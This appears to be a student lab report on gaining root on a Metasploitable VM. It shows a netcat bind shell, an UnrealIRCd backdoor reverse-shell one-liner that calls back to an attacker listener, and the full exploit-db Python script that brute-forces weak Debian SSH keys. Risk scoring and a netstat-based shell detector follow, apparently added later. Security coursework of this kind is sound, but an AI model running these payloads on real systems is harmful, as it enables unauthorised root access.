# 2

![](https://hackmd.io/_uploads/SJ8o3Sh_n.png)
![](https://hackmd.io/_uploads/S1nPTHhuh.png)

IP addresses:

- KALI : 10.0.2.12
- METASPLOITABLE : 10.0.2.13

![](https://hackmd.io/_uploads/S1CQ6Hnun.png)

# 3

![](https://hackmd.io/_uploads/H14G_IWF3.png)
![](https://hackmd.io/_uploads/ryEGdIWt3.png)
![](https://hackmd.io/_uploads/S1EzOLZt3.png)
![](https://hackmd.io/_uploads/ry4fdUZYn.png)

# 4

![](https://hackmd.io/_uploads/BJKyKIZFh.png)
![](https://hackmd.io/_uploads/r1i13BBKh.png)
![](https://hackmd.io/_uploads/S13PnHHY2.png)

Command run: `nc 10.0.2.13 1524`. To verify that we have root access on the vulnerable VM, we run the command `netstat -naop | grep 1524`.

Explanation of the netstat command: netstat stands for network statistics, and it shows which ports are open and/or have established connections. The following options produce the output:

```csvpreview
Option,Description
n,Show addresses and port numbers
a,List all ports and connections
o,Displays process identifier (PID) for each connection
p,Display protocol of connection
```

By running the netstat command, we can see from the `ESTABLISHED` TCP connection that the Kali Linux VM (10.0.2.12) is connected successfully to the Metasploitable VM (10.0.2.13). The `whoami` command also shows that I have gained root access to the Metasploitable VM.

# 5

![](https://hackmd.io/_uploads/SJgjo8WKn.png)
![](https://hackmd.io/_uploads/rkloiLbt2.png)

The password is shown to be `password`; running `whoami` and `netstat -pent`:

![](https://hackmd.io/_uploads/BJxjoLbKn.png)

# 7

Additional Exploit 1:

![](https://hackmd.io/_uploads/rkYJFLWF2.png)
![](https://hackmd.io/_uploads/B1t1YUZYh.png)
![](https://hackmd.io/_uploads/ByFXo8-Fn.png)
![](https://hackmd.io/_uploads/rkY7jLbth.png)
![](https://hackmd.io/_uploads/BJ7Si8Zth.png)
![](https://hackmd.io/_uploads/HkXSjUWYh.png)

This is done using Metasploit.
For the non-Metasploit version:

![](https://hackmd.io/_uploads/rkYJFLWF2.png)

Find the exploit using the command `searchsploit unrealircd`. This is done to see where to download the necessary payload.

![](https://hackmd.io/_uploads/Hygv0BSt3.png)

The `Remote Downloader/Execute Trojan` - 13853.pl exploit seems like the right script to use. To see the exploit script, the following command is run: `gedit /usr/share/exploitdb/platforms/linux/remote/13853.pl`

![](https://hackmd.io/_uploads/B1ehgUSFn.png)

Credit:

- https://ivanitlearning.wordpress.com/2020/09/11/hackthebox-irked/
- https://0xdf.gitlab.io/2019/04/27/htb-irked.html

We found out that `AB` is the backdoor command for UnrealIRCd. In order to start the exploit, run `nc -nlvp 443`:

![](https://hackmd.io/_uploads/ByJeXIHK3.png)

`nc 10.0.2.13 6667`

`AB;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.12 443 >/tmp/f`

![](https://hackmd.io/_uploads/rkBLE8SY2.png)

The results show that we have gained root access. There is a connection established between the 2 VMs through the UnrealIRCd port and the new port created for the exploit.

Additional Exploit 2:

![](https://hackmd.io/_uploads/B1iY6IWF2.png)

https://www.rapid7.com/db/vulnerabilities/openssl-debian-weak-keys/

The exploit ID: CVE-2008-0166

Searching www.exploit-db.com, we can use the Python version in order to execute the exploit. The Python code can be found here: https://www.exploit-db.com/exploits/5720.

```python
#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
############################################################################
# Author: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
# 2. Extract it to a directory
#
# 3. Execute the python script
#    - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
#    - execute: python exploit.py (without parameters) to display the help
#    - if the key is found, the script shows something like that:
#        Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
#        Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################

import Queue
import os
import string
import time
from threading import Thread
import sys

# This class only has a boolean, which will be True if some thread finds the key
class End():
    def __init__(self):
        self.end = False

    def Finish(self):
        self.end = True

    def GetEnd(self):
        return self.end

# This is the thread class
class Connection(Thread):
    def __init__(self, QueueDir, TheEnd, dir, host, user, port='22'):
        Thread.__init__(self)
        self.QueueDir = QueueDir
        self.TheEnd = TheEnd
        self.dir = dir
        self.host = host
        self.user = user
        self.port = port

    def run(self):
        while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
            key = self.QueueDir.get()
            cmd = 'ssh -l ' + self.user
            cmd = cmd + ' -p ' + self.port
            cmd = cmd + ' -o PasswordAuthentication=no'
            cmd = cmd + ' -i ' + self.dir + '/' + key
            cmd = cmd + ' ' + self.host + ' exit; echo $?'
            pin, pout, perr = os.popen3(cmd, 'r')
            pin.close()
            # To debug, uncomment the next line. This will show the errors reported by ssh
            #print perr.read()
            if pout.read().lstrip().rstrip() == '0':
                self.TheEnd.Finish()
                print ''
                print 'Key Found in file: ' + key
                print 'Execute: ssh -l%s -p%s -i %s/%s %s' % (self.user, self.port, self.dir, key, self.host)
                print ''

print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
if len(sys.argv) < 4:
    print './exploit.py <dir> <host> <user> [[port] [threads]]'
    print '   <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
    print '   <host>: The victim host'
    print '   <user>: The user of the victim host'
    print '   [port]: The SSH port of the victim host (default 22)'
    print '   [threads]: Number of threads (default 4) Too big number is bad'
    sys.exit(1)

dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]

if len(sys.argv) <= 4:
    port = '22'
    threads = 4
else:
    if len(sys.argv) <= 5:
        port = sys.argv[4]
        threads = 4
    else:
        port = sys.argv[4]
        threads = sys.argv[5]

ListDir = os.listdir(dir)
QueueDir = Queue.Queue()
TheEnd = End()

# Queue every private key in the directory (public keys are skipped)
for i in range(len(ListDir)):
    if ListDir[i].find('.pub') == -1:
        QueueDir.put(ListDir[i])

initsize = QueueDir.qsize()
tested = 0

for i in range(0, int(threads)):
    Connection(QueueDir, TheEnd, dir, host, user, port).start()

# Progress report every 5 seconds until a key is found or the queue is drained
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
    time.sleep(5)
    actsize = QueueDir.qsize()
    speed = (initsize - tested - actsize) / 5
    tested = initsize - actsize
    print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' % (tested, actsize, speed)

# milw0rm.com [2008-06-01]
```

This is saved as `5720.py`.
To brute force the keys we can download the common keys from: https://github.com/g0tmi1k/debian-ssh/tree/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2

Extracting the keys into the `rsa/2048` folder:

![](https://hackmd.io/_uploads/S1HBHwWFh.png)

`python 5720.py rsa/2048 10.0.2.13 root`

Execute: `ssh -lroot -p22 -i rsa/2048/57c3115d77c56390332dc5c49978627a-5429 10.0.2.13`

![](https://hackmd.io/_uploads/BJPJE0-Fn.png)
![](https://hackmd.io/_uploads/ryq-VRZKh.png)

# 8

As the 4 vulnerabilities are similar, since they all deal with reverse shells or remote shells, the CVSS scoring below applies to all 4 of them:

```csvpreview
Metric,Value,Description
Attack Vector,Network,Attack is done through a network exploit (reverse shell | vnc | etc.)
Attack Complexity,Low,Only need to scan and it can be easily done with preset code/commands
Privileges Required,None,There's no password or any type of privilege escalation needed.
User Interaction,None,No user interaction necessary
Scope,Unchanged,Vulnerability affects the same machine as the shell.
Confidentiality,High,Attacker will have root access and is able to read files
Integrity,High,Attacker will have root access and is able to write/modify files
Availability,High,Attacker will have root access and can stop any service.
```

![](https://hackmd.io/_uploads/rJT8017Fn.png)
![](https://hackmd.io/_uploads/Bkl_0kmt2.png)

The score is 9.8, which is considered critical. The main method of securing the machine would be updating the software on the Metasploitable VM, since the vulnerabilities are already recorded and extensively available in the wild. Make sure that the critical Nessus findings are remediated.
To further solidify the threat, we would also use the OWASP risk calculator:

```csvpreview
Metric,Level,Description
Skill Level,Some Technical Skills,Need to at least know how to run Metasploit and Python
Motive,Possible Reward,Server has possible reward to steal
Opportunity,No access or resources required,The server can easily be attacked through the network
Size,Anonymous Internet Users,Can exploit through the network easily
Ease of Discovery,Automated Tools available,Metasploit is available
Ease of Exploit,Easy,There is code and there are commands available on the internet
Awareness,Obvious,CVE ID available
Intrusion Detection,Not logged,No logging done to check for the intrusion
Loss of confidentiality,Extensive critical data disclosed,There will be a high amount of sensitive data disclosed assuming it's a server
Loss of availability,Minimal primary service interrupted,Little disruption to the running of the server but there may be extra traffic in the network
Loss of integrity,Extensive seriously corrupted data,With root access data in the server can be easily changed.
Loss of accountability,Possibly traceable,It is possible to get the attacker IP address from just netstat
Financial damage,Significant effect on annual profit,Sensitive financial data can ruin the business assuming the server belongs to a small business
Reputation damage,Brand damage,Loss of customer trust since the data is out in the wild now
Non-compliance,High profile violation,Too many misconfigurations and easy-to-fix exploits
Privacy violation,Hundreds of people,Both customer and business stakeholders will be affected assuming the server belongs to a small business.
```

![](https://hackmd.io/_uploads/H1V4LxQth.png)

Extensive damage can be done when there are too many violations of the security controls.
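The table rates intrusion detection as "Not logged", yet the netstat check from section 4 is exactly the evidence a defender could collect automatically: a socket owned directly by a shell or by netcat is the footprint of a bind or reverse shell, and the foreign column names the peer. This is an added example, not code from the original report; it parses constructed `netstat -naop` output (on Linux the PID/Program name column comes from `-p` and `-o` adds the timer column; the optional User/Inode pair from `netstat -pent` is handled too) and flags such sockets.

```python
import re

# Constructed sample in Linux `netstat -naop` layout, as seen on the Metasploitable VM (10.0.2.13)
# with the Kali VM (10.0.2.12) as the peer. Values are made up for the example.
SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      4821/xinetd          off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      4701/sshd            off (0.00/0/0)
tcp        0      0 10.0.2.13:1524          10.0.2.12:41622         ESTABLISHED 5012/sh              off (0.00/0/0)
tcp        0      0 10.0.2.13:6667          10.0.2.12:50210         ESTABLISHED 4999/unrealircd      off (0.00/0/0)
tcp        0      0 10.0.2.13:37780         10.0.2.12:443           ESTABLISHED 5020/bash            off (0.00/0/0)
tcp        0      0 10.0.2.13:22            10.0.2.12:55010         ESTABLISHED 5100/sshd            off (0.00/0/0)
"""

# Programs that should not own a TCP socket themselves: shells and netcat-style relays.
SHELL_PROGRAMS = {"sh", "bash", "dash", "zsh", "ksh", "nc", "ncat", "netcat"}

# Matches TCP rows from `netstat -naop` and `netstat -pent` (the optional User/Inode pair comes from -e).
ROW_RE = re.compile(
    r"^(?P<proto>tcp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<foreign>\S+)\s+"
    r"(?P<state>[A-Z_]+)\s+(?:\d+\s+\d+\s+)?(?P<pid>\d+)/(?P<prog>\S+)"
)


def parse_netstat(text):
    """Return one dict per TCP row whose owning process is visible (root is needed for -p to show it)."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def shell_sockets(rows):
    """Flag sockets owned by a shell or netcat; the foreign address identifies the peer."""
    findings = []
    for r in rows:
        if r["prog"] in SHELL_PROGRAMS:
            peer_ip, peer_port = r["foreign"].rsplit(":", 1)
            findings.append({"pid": int(r["pid"]), "prog": r["prog"], "state": r["state"],
                             "local": r["local"], "peer": peer_ip, "peer_port": peer_port})
    return findings


if __name__ == "__main__":
    for f in shell_sockets(parse_netstat(SAMPLE)):
        print("%(state)s %(local)s <-> %(peer)s:%(peer_port)s owned by %(prog)s (pid %(pid)d)" % f)
```

The two flagged rows are the bind shell on 1524 and the outbound connection to the listener on 443; the sshd and unrealircd rows on the same peer are not flagged, so the program name, not the peer, is the discriminator.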
This exercise has taught me to make sure that the machines that we have are always up to date, lest there be exploits that can be exploited easily once they are recorded in Metasploit or on the web. Critical exploits must always be fixed in order to have a secure system. I have personally learned that exploiting known exploits is actually not that hard.